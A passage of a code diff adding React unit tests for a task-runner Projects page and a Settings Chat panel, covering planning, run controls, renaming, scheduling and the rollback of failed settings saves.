+    renderWithProviders(<ProjectsPage />)
+    const refinedTa = await screen.findByLabelText('Refined spec') as HTMLTextAreaElement
+    expect(refinedTa.value).toBe('REFINED SPEC')
+    fireEvent.change(refinedTa, { target: { value: 'REFINED SPEC v2' } })
+
+    fireEvent.click(screen.getByRole('button', { name: 'Plan from Spec' }))
+    await waitFor(() => expect(api.planTask).toHaveBeenCalledWith('REFINED SPEC v2', 'spec', undefined, '', ''))
+  })
+
+  it('runs the refined spec through the second Run button', async () => {
+    vi.mocked(api.refineStatus).mockResolvedValue({ status: 'idle', text: 'REFINED SPEC', error: '' })
+    renderWithProviders(<ProjectsPage />)
+    await screen.findByLabelText('Refined spec')
+    // One Run in the compose row, one in the refined-spec row.
+    const runButtons = screen.getAllByRole('button', { name: 'Run' })
+    expect(runButtons).toHaveLength(2)
+    fireEvent.click(runButtons[1])
+    await waitFor(() => expect(api.planTask).toHaveBeenCalledWith('REFINED SPEC', 'spec', '', '', ''))
+  })
+
+  it('discards the refined spec', async () => {
+    vi.mocked(api.refineStatus).mockResolvedValue({ status: 'idle', text: 'REFINED SPEC', error: '' })
+    renderWithProviders(<ProjectsPage />)
+    await screen.findByLabelText('Refined spec')
+    fireEvent.click(screen.getByRole('button', { name: 'Discard' }))
+    await waitFor(() => expect(screen.queryByLabelText('Refined spec')).not.toBeInTheDocument())
+    expect(api.planTask).not.toHaveBeenCalled()
+  })
+
+  it('surfaces a refine error alongside the refined text', async () => {
+    vi.mocked(api.refineStatus).mockResolvedValue({ status: 'idle', text: 'PARTIAL', error: 'model timed out' })
+    renderWithProviders(<ProjectsPage />)
+    expect(await screen.findByText(/model timed out/)).toBeInTheDocument()
+  })
+
+  it('restores a server-side prompt into an empty compose box', async () => {
+    vi.mocked(api.refineStatus).mockResolvedValue({ status: 'idle', text: '', error: '', input: 'restored idea' })
+    renderWithProviders(<ProjectsPage />)
+    const ta = screen.getByPlaceholderText('Describe your task...') as HTMLTextAreaElement
+    await waitFor(() => expect(ta.value).toBe('restored idea'))
+  })
+
+  it('falls back to idle when the refine status request fails', async () => {
+    vi.mocked(api.refineStatus).mockRejectedValue(new Error('refine endpoint down'))
+    renderWithProviders(<ProjectsPage />)
+    expect(await screen.findByRole('button', { name: 'Refine into Spec' })).toBeInTheDocument()
+    expect(screen.queryByText('Refining…')).not.toBeInTheDocument()
+  })
+})
+
+describe('ProjectsPage — planning lifecycle', () => {
+  it('selects the run that planTask produced', async () => {
+    const planned = mkRun({ task_id: 'plan-1', name: 'Planned Work', status: 'planned' })
+    resetApi([planned])
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.change(screen.getByPlaceholderText('Describe your task...'), { target: { value: 'do the thing' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Plan' }))
+    expect(await screen.findByTestId('project-detail')).toBeInTheDocument()
+    expect(api.planTask).toHaveBeenCalledWith('do the thing', 'text', undefined, '', '')
+  })
+
+  it('threads the picked agent into planTask', async () => {
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.change(await screen.findByLabelText('Agent picker'), { target: { value: 'reviewer' } })
+    fireEvent.change(screen.getByPlaceholderText('Describe your task...'), { target: { value: 'audit the rail' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Plan' }))
+    await waitFor(() => expect(api.planTask).toHaveBeenCalledWith('audit the rail', 'text', undefined, 'reviewer', ''))
+  })
+
+  it('shows the backend error when planTask reports failure', async () => {
+    vi.mocked(api.planTask).mockResolvedValue({ ok: false, error: 'decomposer refused' })
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.change(screen.getByPlaceholderText('Describe your task...'), { target: { value: 'x' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Plan' }))
+    expect(await screen.findByText('decomposer refused')).toBeInTheDocument()
+  })
+
+  it('shows a generic error when planTask reports failure with no message', async () => {
+    vi.mocked(api.planTask).mockResolvedValue({ ok: false })
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.change(screen.getByPlaceholderText('Describe your task...'), { target: { value: 'x' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Plan' }))
+    expect(await screen.findByText('Failed to generate plan')).toBeInTheDocument()
+  })
+
+  it('shows the thrown message when the plan request rejects', async () => {
+    vi.mocked(api.planTask).mockRejectedValue(new Error('network down'))
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.change(screen.getByPlaceholderText('Describe your task...'), { target: { value: 'x' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Plan' }))
+    expect(await screen.findByText('network down')).toBeInTheDocument()
+  })
+
+  it('cancels a planning run restored from sessionStorage', async () => {
+    sessionStorage.setItem('tr-planning', '1')
+    renderWithProviders(<ProjectsPage />)
+    expect(screen.getByText(/Generating execution plan/)).toBeInTheDocument()
+    fireEvent.click(screen.getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(api.cancelPlan).toHaveBeenCalledTimes(1))
+    await waitFor(() => expect(screen.queryByText(/Generating execution plan/)).not.toBeInTheDocument())
+    expect(sessionStorage.getItem('tr-planning')).toBeNull()
+  })
+
+  it('ticks the planning banner dots', async () => {
+    sessionStorage.setItem('tr-planning', '1')
+    vi.useFakeTimers()
+    renderWithProviders(<ProjectsPage />)
+    const banner = screen.getByText(/Generating execution plan/)
+    expect(banner.textContent).toBe('Generating execution plan')
+    await act(async () => { await vi.advanceTimersByTimeAsync(500) })
+    expect(banner.textContent).toBe('Generating execution plan.')
+  })
+
+  it('recovery poll adopts a planned run and stops planning', async () => {
+    resetApi([mkRun({ task_id: 'rec-1', name: 'Recovered', status: 'planned' })])
+    sessionStorage.setItem('tr-planning', '1')
+    vi.useFakeTimers()
+    renderWithProviders(<ProjectsPage />)
+    await act(async () => { await vi.advanceTimersByTimeAsync(2100) })
+    expect(sessionStorage.getItem('tr-planning')).toBeNull()
+    expect(screen.getByTestId('project-detail')).toBeInTheDocument()
+    expect(screen.queryByText(/Generating execution plan/)).not.toBeInTheDocument()
+  })
+
+  it('recovery poll surfaces a failed run error instead of a plan', async () => {
+    resetApi([mkRun({ task_id: 'rec-2', name: 'Broken', status: 'failed', error: 'planner exploded' })])
+    sessionStorage.setItem('tr-planning', '1')
+    vi.useFakeTimers()
+    renderWithProviders(<ProjectsPage />)
+    await act(async () => { await vi.advanceTimersByTimeAsync(2100) })
+    expect(sessionStorage.getItem('tr-planning')).toBeNull()
+    expect(screen.getByText('planner exploded')).toBeInTheDocument()
+  })
+
+  it('the refresh interval does not stack a second load on an in-flight one', async () => {
+    let release: () => void = () => {}
+    const gate = new Promise<void>(r => { release = r })
+    vi.mocked(api.taskRunnerStatus).mockImplementation(async () => {
+      await gate
+      return { running: false, available: true, runs: [] }
+    })
+    vi.useFakeTimers()
+    renderWithProviders(<ProjectsPage />)
+    await act(async () => { await vi.advanceTimersByTimeAsync(3100) })
+    expect(api.taskRunnerStatus).toHaveBeenCalledTimes(1)
+    release()
+    await act(async () => { await vi.advanceTimersByTimeAsync(0) })
+  })
+})
+
+describe('ProjectsPage — applied deep link', () => {
+  it('selects the run named by ?applied', async () => {
+    resetApi([mkRun({ task_id: 'run-7', name: 'Applied Run' })])
+    renderWithProviders(<ProjectsPage />, { route: '/projects?applied=run-7' })
+    expect(await screen.findByTestId('project-detail')).toBeInTheDocument()
+    expect(screen.getAllByText('Applied Run').length).toBeGreaterThan(1)
+  })
+
+  it('auto-executes a planned run when ?autoRun=true', async () => {
+    resetApi([mkRun({ task_id: 'run-8', name: 'Auto Run', status: 'planned' })])
+    renderWithProviders(<ProjectsPage />, { route: '/projects?applied=run-8&autoRun=true' })
+    // Auto-run is a programmatic launch, never an affirmative trust grant.
+    await waitFor(() => expect(api.executePlan).toHaveBeenCalledWith('run-8', '', false))
+  })
+
+  it('leaves an unknown ?applied id unselected', async () => {
+    resetApi([mkRun({ task_id: 'run-9', name: 'Other Run' })])
+    renderWithProviders(<ProjectsPage />, { route: '/projects?applied=missing-run' })
+    await screen.findByText('Other Run')
+    expect(screen.queryByTestId('project-detail')).not.toBeInTheDocument()
+  })
+})
+
+describe('ProjectsPage — run rail selection', () => {
+  it('selects a run from the keyboard and clears it again via New Task', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.keyDown(await screen.findByRole('button', { name: 'Open project Existing' }), { key: 'Enter' })
+    expect(await screen.findByTestId('project-detail')).toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: 'New Task' }))
+    expect(screen.getByPlaceholderText('Describe your task...')).toBeInTheDocument()
+    expect(screen.queryByTestId('project-detail')).not.toBeInTheDocument()
+  })
+
+  it('selects a run when Space is pressed on the row', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.keyDown(await screen.findByRole('button', { name: 'Open project Existing' }), { key: ' ' })
+    expect(await screen.findByTestId('project-detail')).toBeInTheDocument()
+  })
+
+  it('forwards a per-step retry from the detail pane', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    await openRun()
+    fireEvent.click(screen.getByRole('button', { name: 'detail retry step' }))
+    await waitFor(() => expect(api.retryTaskRun).toHaveBeenCalledWith('run-1', 3))
+  })
+
+  it('forwards a refresh request from the detail pane', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    await openRun()
+    const before = vi.mocked(api.taskRunnerStatus).mock.calls.length
+    fireEvent.click(screen.getByRole('button', { name: 'detail refresh' }))
+    await waitFor(() => expect(vi.mocked(api.taskRunnerStatus).mock.calls.length).toBeGreaterThan(before))
+  })
+})
+
+describe('ProjectsPage — renaming a run', () => {
+  it('commits a new name on blur', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    await openRun()
+    fireEvent.click(screen.getAllByRole('button', { name: 'Rename project' })[0])
+    const input = screen.getByLabelText('Project name') as HTMLInputElement
+    expect(input.value).toBe('Existing')
+    fireEvent.change(input, { target: { value: 'Renamed run' } })
+    fireEvent.blur(input)
+    await waitFor(() => expect(api.renameTaskRun).toHaveBeenCalledWith('run-1', 'Renamed run'))
+  })
+
+  it('does not call the rename endpoint when the name is unchanged', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    await openRun()
+    fireEvent.click(screen.getAllByRole('button', { name: 'Rename project' })[0])
+    fireEvent.blur(screen.getByLabelText('Project name'))
+    await waitFor(() => expect(screen.queryByLabelText('Project name')).not.toBeInTheDocument())
+    expect(api.renameTaskRun).not.toHaveBeenCalled()
+  })
+
+  it('blurs on Enter and abandons the edit on Escape', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    await openRun()
+    fireEvent.click(screen.getAllByRole('button', { name: 'Rename project' })[0])
+    fireEvent.keyDown(screen.getByLabelText('Project name'), { key: 'Escape' })
+    await waitFor(() => expect(screen.queryByLabelText('Project name')).not.toBeInTheDocument())
+    expect(api.renameTaskRun).not.toHaveBeenCalled()
+
+    fireEvent.click(screen.getAllByRole('button', { name: 'Rename project' })[0])
+    const input = screen.getByLabelText('Project name')
+    fireEvent.change(input, { target: { value: 'Enter committed' } })
+    fireEvent.keyDown(input, { key: 'Enter' })
+    await waitFor(() => expect(api.renameTaskRun).toHaveBeenCalledWith('run-1', 'Enter committed'))
+  })
+
+  it('opens the editor from the pencil affordance, by click and by keyboard', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    await openRun()
+    fireEvent.click(screen.getAllByRole('button', { name: 'Rename project' })[1])
+    expect(screen.getByLabelText('Project name')).toBeInTheDocument()
+    fireEvent.keyDown(screen.getByLabelText('Project name'), { key: 'Escape' })
+    await waitFor(() => expect(screen.queryByLabelText('Project name')).not.toBeInTheDocument())
+
+    fireEvent.keyDown(screen.getAllByRole('button', { name: 'Rename project' })[1], { key: ' ' })
+    expect(screen.getByLabelText('Project name')).toBeInTheDocument()
+  })
+
+  it('opens the editor from the name itself via the keyboard', async () => {
+    resetApi([mkRun()])
+    renderWithProviders(<ProjectsPage />)
+    await openRun()
+    fireEvent.keyDown(screen.getAllByRole('button', { name: 'Rename project' })[0], { key: 'Enter' })
+    expect(screen.getByLabelText('Project name')).toBeInTheDocument()
+  })
+
+  it('falls back to a placeholder name for an unnamed run', async () => {
+    resetApi([mkRun({ name: '', spec_name: '' })])
+    renderWithProviders(<ProjectsPage />)
+    fireEvent.click(await screen.findByRole('button', { name: 'Open project run-1' }))
+    await screen.findByTestId('project-detail')
+    fireEvent.keyDown(screen.getAllByRole('button', { name: 'Rename project' })[0], { key: 'Enter' })
+    expect((screen.getByLabelText('Project name') as HTMLInputElement).value).toBe('Project')
+  })
+})
+
+describe('ProjectsPage — header actions for a planned run', () => {
+  const planned = () => mkRun({ status: 'planned' })
+
+  it('hands the plan to chat', async () => {
+    resetApi([planned()])
+    const { store } = renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Chat' }))
+    await waitFor(() => expect(api.planContext).toHaveBeenCalledWith('run-1'))
+    await waitFor(() => expect(store.getState().chat.pendingInput).toContain('PLAN CONTEXT'))
+  })
+
+  it('does not push to chat when no plan context comes back', async () => {
+    resetApi([planned()])
+    vi.mocked(api.planContext).mockResolvedValue({ ok: true, context: '' })
+    const { store } = renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Chat' }))
+    await waitFor(() => expect(api.planContext).toHaveBeenCalledTimes(1))
+    expect(store.getState().chat.pendingInput).toBeNull()
+  })
+
+  it('discards the plan and returns to the compose panel', async () => {
+    resetApi([planned()])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Discard' }))
+    await waitFor(() => expect(api.deleteTaskRun).toHaveBeenCalledWith('run-1'))
+    expect(await screen.findByPlaceholderText('Describe your task...')).toBeInTheDocument()
+  })
+
+  it('executes with the per-run auto-approve grant the user ticked', async () => {
+    resetApi([planned()])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    const box = within(header).getByRole('checkbox') as HTMLInputElement
+    expect(box.checked).toBe(false)
+    fireEvent.click(box)
+    fireEvent.click(within(header).getByRole('button', { name: 'Execute' }))
+    await waitFor(() => expect(api.executePlan).toHaveBeenCalledWith('run-1', '', true))
+  })
+})
+
+describe('ProjectsPage — header actions by run status', () => {
+  it('cancels a run that is still planning', async () => {
+    resetApi([mkRun({ status: 'planning' })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    expect(within(header).getByText('Planning…')).toBeInTheDocument()
+    fireEvent.click(within(header).getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(api.cancelPlan).toHaveBeenCalledTimes(1))
+    expect(await screen.findByPlaceholderText('Describe your task...')).toBeInTheDocument()
+  })
+
+  it('pauses a running run', async () => {
+    resetApi([mkRun({ status: 'running', running: true })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    expect(within(header).getByText('Running')).toBeInTheDocument()
+    fireEvent.click(within(header).getByRole('button', { name: 'Pause' }))
+    await waitFor(() => expect(api.pauseTaskRun).toHaveBeenCalledWith('run-1'))
+  })
+
+  it('cancels a running run from the header, not the rail', async () => {
+    resetApi([mkRun({ status: 'running', running: true })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(api.cancelTaskRunner).toHaveBeenCalledWith('run-1'))
+  })
+
+  it('resumes a paused run and offers no Restart', async () => {
+    resetApi([mkRun({ status: 'paused' })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    expect(within(header).queryByRole('button', { name: 'Restart' })).not.toBeInTheDocument()
+    fireEvent.click(within(header).getByRole('checkbox'))
+    fireEvent.click(within(header).getByRole('button', { name: 'Resume' }))
+    await waitFor(() => expect(api.executePlan).toHaveBeenCalledWith('run-1', '', true))
+  })
+
+  it('shows a paused run unchecked even when it carries a stale auto-approve intent', async () => {
+    resetApi([mkRun({ status: 'paused', auto_approve: true, auto_approve_remaining_secs: 0 })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    expect((within(header).getByRole('checkbox') as HTMLInputElement).checked).toBe(false)
+  })
+
+  it('reflects a live auto-approve grant as checked', async () => {
+    resetApi([mkRun({ status: 'paused', auto_approve_remaining_secs: 900 })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    expect((within(header).getByRole('checkbox') as HTMLInputElement).checked).toBe(true)
+  })
+
+  it('moves a completed run into a chat slot', async () => {
+    resetApi([mkRun({ status: 'completed' })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Chat' }))
+    await waitFor(() => expect(api.taskRunToChat).toHaveBeenCalledWith('run-1'))
+  })
+
+  it('stays put when the run cannot be moved into a slot', async () => {
+    resetApi([mkRun({ status: 'cancelled' })])
+    vi.mocked(api.taskRunToChat).mockResolvedValue({ slot: null })
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Chat' }))
+    await waitFor(() => expect(api.taskRunToChat).toHaveBeenCalledTimes(1))
+    expect(screen.getByTestId('project-detail')).toBeInTheDocument()
+  })
+
+  it('schedules a completed run as a daily cron job', async () => {
+    resetApi([mkRun({ status: 'completed', spec_content: 'rebuild the index' })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Schedule' }))
+    await waitFor(() => expect(api.createCron).toHaveBeenCalledWith({
+      name: 'Project: Existing',
+      message: 'run __inline__:rebuild the index',
+      every: 86400,
+    }))
+    expect(alertSpy).toHaveBeenCalledWith('Scheduled as daily cron job')
+  })
+
+  it('refuses to schedule a run with nothing to re-run', async () => {
+    resetApi([mkRun({ status: 'completed', spec_content: '', original_input: '' })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Schedule' }))
+    await waitFor(() => expect(alertSpy).toHaveBeenCalledWith('No spec/idea to schedule'))
+    expect(api.createCron).not.toHaveBeenCalled()
+  })
+
+  it('restarts a failed run from the first step', async () => {
+    resetApi([mkRun({ status: 'failed', error: 'step 2 blew up' })])
+    renderWithProviders(<ProjectsPage />)
+    const header = await openRun()
+    fireEvent.click(within(header).getByRole('button', { name: 'Restart' }))
+    await waitFor(() => expect(api.retryTaskRun).toHaveBeenCalledWith('run-1', 1))
+  })
+})

--- a/website/src/test/SettingsChatPanelCoverage.test.tsx
+++ b/website/src/test/SettingsChatPanelCoverage.test.tsx
@@ -1,0 +1,686 @@
+/**
+ * Coverage pass over Settings ▸ Chat (`pages/settings/ChatPanel.tsx`).
+ *
+ * The existing ChatPanel specs pin a handful of rows in depth (default model,
+ * About You, link previews, verbosity, knowledge opt-in). What they leave cold
+ * is the long tail: every OTHER row's `onChange`, the per-role model/effort
+ * block, the two query-failure banners with their Retry buttons, the save-error
+ * banner and its dismiss, and — most importantly — the `onError` arm of each
+ * mutation, which is where an optimistic write gets rolled back.
+ *
+ * This file drives those. It deliberately does NOT re-assert what the sibling
+ * specs already own.
+ */
+
+// SettingsSelect wraps Radix Select, whose portalled listbox jsdom cannot open;
+// the repo's double (also used by SettingsSelect.test.tsx) makes every picker
+// here driveable as real role="option" nodes.
+vi.mock('@radix-ui/react-select', async () => await import('./__mocks__/@radix-ui/react-select'))
+
+import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { render, screen, fireEvent, waitFor, within } from '@testing-library/react'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+import React from 'react'
+
+const BASE_DASH = {
+  restore_sessions: false,
+  restore_window_minutes: 30,
+  merge_queued_messages: false,
+  widget_density: 'more' as const,
+  verbosity: 'default' as const,
+  quick_send: false,
+  session_grid: false,
+  tail_fork_enabled: false,
+  link_previews: false,
+  mcp_app_panel: false,
+  folder_suggestions_enabled: true,
+}
+
+const BASE_MC = {
+  session: { autocompact_pct: 90 },
+  agent: {
+    model: 'auto',
+    reasoning_effort: '',
+    completion_keep: 'head',
+    completion_keep_chars: 3000,
+    soft_stop_budget_secs: 10,
+  },
+  dashboard: { user_role: '', user_role_other: '', user_technical_level: '', prevent_sleep: false },
+  knowledge: { auto_ingest_chunk_budget: 200 },
+}
+
+const {
+  dashboardConfigMock,
+  updateDashboardConfigMock,
+  kirocrewConfigMock,
+  patchConfigMock,
+  modelsMock,
+  tipsStatusMock,
+  tipsFeedbackMock,
+} = vi.hoisted(() => ({
+  dashboardConfigMock: vi.fn(),
+  updateDashboardConfigMock: vi.fn(() => Promise.resolve({})),
+  kirocrewConfigMock: vi.fn(),
+  patchConfigMock: vi.fn(() => Promise.resolve({})),
+  modelsMock: vi.fn(() =>
+    Promise.resolve([
+      { model_name: 'auto', description: 'Default' },
+      { model_name: 'claude-opus-4.8', description: 'Opus' },
+      { model_name: 'claude-haiku-4.5', description: 'Haiku' },
+    ])
+  ),
+  tipsStatusMock: vi.fn(() => Promise.resolve({ enabled_config: true, opted_out: false })),
+  tipsFeedbackMock: vi.fn(() => Promise.resolve({ ok: true })),
+}))
+
+vi.mock('../api/client', () => ({
+  api: {
+    dashboardConfig: dashboardConfigMock,
+    updateDashboardConfig: updateDashboardConfigMock,
+    kirocrewConfig: kirocrewConfigMock,
+    patchConfig: patchConfigMock,
+    models: modelsMock,
+    voiceConfig: () => Promise.resolve({ enabled: false, voice: 'Ruth', engine: 'neural', rate: '100%', autoSpeak: false, aws_profile: '', region: '' }),
+    sttConfig: () => Promise.resolve({ enabled: false, provider: '', model: '', available: false, streaming: false, transcribe_region: '', transcribe_profile: '', language_code: 'en-US', models: {}, language_codes: [] }),
+    updateVoiceConfig: () => Promise.resolve({}),
+    updateSttConfig: () => Promise.resolve({}),
+    tipsStatus: tipsStatusMock,
+    tipsFeedback: tipsFeedbackMock,
+  },
+}))
+
+import { ChatPanel } from '../pages/settings/ChatPanel'
+
+const LS_KEY = 'mc-chat-config'
+
+function wrap() {
+  const qc = new QueryClient({ defaultOptions: { queries: { retry: false } } })
+  return render(
+    <QueryClientProvider client={qc}>
+      <ChatPanel />
+    </QueryClientProvider>
+  )
+}
+
+/** The localStorage-backed chat config as the panel last wrote it. */
+function storedChat(): Record<string, unknown> {
+  return JSON.parse(localStorage.getItem(LS_KEY) || '{}')
+}
+
+/** Seed the Kiro Crew config query with a deep-merged override of BASE_MC. */
+function seedMc(over: {
+  session?: Record<string, unknown>
+  agent?: Record<string, unknown>
+  dashboard?: Record<string, unknown>
+  knowledge?: Record<string, unknown>
+} = {}) {
+  kirocrewConfigMock.mockImplementation(() =>
+    Promise.resolve({
+      session: { ...BASE_MC.session, ...over.session },
+      agent: { ...BASE_MC.agent, ...over.agent },
+      dashboard: { ...BASE_MC.dashboard, ...over.dashboard },
+      knowledge: { ...BASE_MC.knowledge, ...over.knowledge },
+    }) as never
+  )
+}
+
+/** A switch that has left its loading-disabled state. */
+async function settledSwitch(name: string) {
+  const sw = await screen.findByRole('switch', { name })
+  await waitFor(() => expect(sw).not.toHaveAttribute('aria-disabled'))
+  return sw
+}
+
+/** Open a SettingsSelect by label once it is interactive; returns its options. */
+async function openSelect(label: string) {
+  const trigger = await screen.findByRole('combobox', { name: label })
+  await waitFor(() => expect(trigger).not.toHaveAttribute('data-disabled'))
+  fireEvent.click(trigger)
+  return within(screen.getByRole('listbox')).getAllByRole('option')
+}
+
+/** Open a select and click the option at `index`. */
+async function pickOption(label: string, index: number) {
+  const opts = await openSelect(label)
+  fireEvent.click(opts[index])
+}
+
+/** A number input that has left its loading-disabled state. */
+async function settledInput(name: string) {
+  const input = (await screen.findByLabelText(name)) as HTMLInputElement
+  await waitFor(() => expect(input).not.toBeDisabled())
+  return input
+}
+
+const rejectOnce = (mock: { mockImplementationOnce: (fn: () => unknown) => unknown }) =>
+  mock.mockImplementationOnce(() => Promise.reject(new Error('boom')))
+
+beforeEach(() => {
+  localStorage.clear()
+  dashboardConfigMock.mockReset()
+  updateDashboardConfigMock.mockReset()
+  kirocrewConfigMock.mockReset()
+  patchConfigMock.mockReset()
+  tipsStatusMock.mockReset()
+  tipsFeedbackMock.mockReset()
+  dashboardConfigMock.mockImplementation(() => Promise.resolve({ ...BASE_DASH }) as never)
+  updateDashboardConfigMock.mockImplementation(() => Promise.resolve({}) as never)
+  patchConfigMock.mockImplementation(() => Promise.resolve({}) as never)
+  tipsStatusMock.mockImplementation(() =>
+    Promise.resolve({ enabled_config: true, opted_out: false }) as never
+  )
+  tipsFeedbackMock.mockImplementation(() => Promise.resolve({ ok: true }) as never)
+  seedMc()
+})
+
+describe('ChatPanel — load failures', () => {
+  it('surfaces a dashboard-config load failure and refetches on Retry', async () => {
+    rejectOnce(dashboardConfigMock)
+    wrap()
+    expect(await screen.findByText('Failed to load dashboard config.')).toBeInTheDocument()
+    expect(dashboardConfigMock).toHaveBeenCalledTimes(1)
+
+    fireEvent.click(screen.getByRole('button', { name: 'Retry' }))
+    await waitFor(() => expect(dashboardConfigMock).toHaveBeenCalledTimes(2))
+    await waitFor(() =>
+      expect(screen.queryByText('Failed to load dashboard config.')).not.toBeInTheDocument()
+    )
+  })
+
+  it('surfaces a config load failure and refetches on Retry', async () => {
+    rejectOnce(kirocrewConfigMock)
+    wrap()
+    expect(await screen.findByText('Failed to load config.')).toBeInTheDocument()
+    expect(kirocrewConfigMock).toHaveBeenCalledTimes(1)
+
+    fireEvent.click(screen.getByRole('button', { name: 'Retry' }))
+    await waitFor(() => expect(kirocrewConfigMock).toHaveBeenCalledTimes(2))
+    await waitFor(() =>
+      expect(screen.queryByText('Failed to load config.')).not.toBeInTheDocument()
+    )
+  })
+
+  it('shows one Retry per failed query when both fail', async () => {
+    rejectOnce(dashboardConfigMock)
+    rejectOnce(kirocrewConfigMock)
+    wrap()
+    await screen.findByText('Failed to load dashboard config.')
+    await screen.findByText('Failed to load config.')
+    expect(screen.getAllByRole('button', { name: 'Retry' })).toHaveLength(2)
+  })
+})
+
+describe('ChatPanel — save-error banner', () => {
+  it('rolls the optimistic write back and explains the failure', async () => {
+    rejectOnce(updateDashboardConfigMock)
+    wrap()
+    const sw = await settledSwitch('Quick Send')
+    fireEvent.click(sw)
+    expect(await screen.findByText(/Failed to save dashboard config/)).toBeInTheDocument()
+    // onError restores the pre-mutation cache entry, so the switch goes back off.
+    await waitFor(() => expect(sw).toHaveAttribute('aria-checked', 'false'))
+  })
+
+  it('clears the banner when dismissed', async () => {
+    rejectOnce(updateDashboardConfigMock)
+    wrap()
+    fireEvent.click(await settledSwitch('Quick Send'))
+    const banner = await screen.findByText(/Failed to save dashboard config/)
+    expect(banner).toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Dismiss' }))
+    await waitFor(() =>
+      expect(screen.queryByText(/Failed to save dashboard config/)).not.toBeInTheDocument()
+    )
+  })
+})
+
+describe('ChatPanel — Composer', () => {
+  it('stores the picked send shortcut locally', async () => {
+    wrap()
+    await pickOption('Send shortcut', 1)
+    await waitFor(() => expect(storedChat().sendOnEnter).toBe('ctrl-enter'))
+  })
+
+  it('stores the follow-up bar layout from the button group', async () => {
+    wrap()
+    const group = await screen.findByRole('group', { name: 'Follow-Up Bar Layout' })
+    fireEvent.click(within(group).getByRole('button', { name: 'Multiline' }))
+    await waitFor(() => expect(storedChat().followUpLayout).toBe('multiline'))
+  })
+
+  it('persists Quick Send through the dashboard config, keeping siblings', async () => {
+    wrap()
+    fireEvent.click(await settledSwitch('Quick Send'))
+    await waitFor(() =>
+      expect(updateDashboardConfigMock).toHaveBeenCalledWith({ ...BASE_DASH, quick_send: true })
+    )
+  })
+
+  it('persists Merge Queued Messages', async () => {
+    wrap()
+    fireEvent.click(await settledSwitch('Merge Queued Messages'))
+    await waitFor(() =>
+      expect(updateDashboardConfigMock).toHaveBeenCalledWith({
+        ...BASE_DASH,
+        merge_queued_messages: true,
+      })
+    )
+  })
+
+  it('PATCHes the soft-stop budget on blur with an in-range value', async () => {
+    wrap()
+    const input = await settledInput('Soft-stop budget (seconds)')
+    await waitFor(() => expect(input.value).toBe('10'))
+    fireEvent.change(input, { target: { value: '20.5' } })
+    fireEvent.blur(input)
+    await waitFor(() =>
+      expect(patchConfigMock).toHaveBeenCalledWith('agent.soft_stop_budget_secs', 20.5)
+    )
+  })
+
+  it.each([
+    ['above the ceiling', '600'],
+    ['below the floor', '0.1'],
+    ['not a number', 'abc'],
+  ])('reverts the soft-stop budget and writes nothing when %s', async (_case, typed) => {
+    wrap()
+    const input = await settledInput('Soft-stop budget (seconds)')
+    await waitFor(() => expect(input.value).toBe('10'))
+    fireEvent.change(input, { target: { value: typed } })
+    fireEvent.blur(input)
+    expect(patchConfigMock).not.toHaveBeenCalled()
+    expect(input.value).toBe('10')
+  })
+
+  it('reverts the soft-stop budget to the server value when the write fails', async () => {
+    rejectOnce(patchConfigMock)
+    wrap()
+    const input = await settledInput('Soft-stop budget (seconds)')
+    await waitFor(() => expect(input.value).toBe('10'))
+    fireEvent.change(input, { target: { value: '30' } })
+    fireEvent.blur(input)
+    expect(await screen.findByText(/Failed to save soft-stop budget/)).toBeInTheDocument()
+    await waitFor(() => expect(input.value).toBe('10'))
+  })
+})
+
+describe('ChatPanel — Messages', () => {
+  it('stores the text streaming style from the button group', async () => {
+    wrap()
+    const group = await screen.findByRole('group', { name: 'Text Streaming Style' })
+    fireEvent.click(within(group).getByRole('button', { name: 'Immediate' }))
+    await waitFor(() => expect(storedChat().streamMode).toBe('immediate'))
+  })
+
+  it('stores the content width from the button group', async () => {
+    wrap()
+    const group = await screen.findByRole('group', { name: 'Content Width' })
